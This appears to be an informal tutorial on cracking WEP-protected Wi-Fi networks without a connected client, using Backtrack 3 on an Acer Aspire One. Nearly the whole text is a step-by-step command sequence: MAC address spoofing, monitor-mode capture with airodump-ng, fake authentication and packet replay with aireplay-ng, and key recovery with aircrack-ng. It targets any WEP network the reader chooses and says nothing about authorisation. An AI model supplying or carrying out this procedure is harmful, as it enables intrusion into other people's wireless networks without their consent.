Okay, brace yourselves for a tutorial on Clientless WEP-cracking on the Aspire One, using Backtrack 3 installed on a USB stick. -Hit F12 while booting to access the boot menu, and select your USB drive. -Select VESA KDE as your graphics mode. -When the desktop shows up, open a Terminal and enter the following commands: airmon-ng stop ath0 ifconfig wifi0 down macchanger --mac 00:11:22:33:44:55 wifi0 airmon-ng start wifi0 airodump-ng ath0 At this point, it will display the networks available, as well as the encryption on them, etc. Pick a network using WEP encryption, and with sufficient power (>15). From now on, the channel number of the AP your are attempting to crack = [chan#], its BSSID = [ap bssid], and the name of your dump file (it can be anything) = [dumpname]. airodump-ng -c [chan#] -w [dumpname] --bssid [ap bssid] ath0 Open another terminal. aireplay-ng -1 0 -a [ap bssid] -h 00:11:22:33:44:55 ath0 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap bssid] -h 00:11:22:33:44:55 ath0 Open another terminal. When the data on your capture reaches at least 5000, execute this command: aircrack-ng [dumpname.cap] Congrats. You've got your key. A reminder though, that it may take a ton of data (60,000+) to crack some networks without a client.